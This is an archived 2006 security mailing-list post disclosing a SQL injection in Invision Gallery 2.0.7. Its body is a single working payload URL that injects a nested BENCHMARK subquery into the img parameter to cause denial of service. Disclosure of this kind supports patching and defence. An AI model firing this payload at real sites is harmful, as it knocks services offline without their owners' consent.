Invision Gallery 2.0.7 SQL Injection Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Invision Gallery 2.0.7 SQL Injection Vulnerability

Subject: Invision Gallery 2.0.7 SQL Injection Vulnerability
Date: 1 Dec 2006 10:22:51 -0000
From: suppressed

Invision Gallery 2.0.7 

DOS attak can be performed

index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )

Prev by Date: Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability
Next by Date: Re: Invision Community Blog Mod 1.2.4 .PHP SQL Injection Vulnerability
Previous by thread: LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities
Next by thread: [SECURITY] [DSA 1205-2] New thttpd packages fix insecure temporary file creation
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.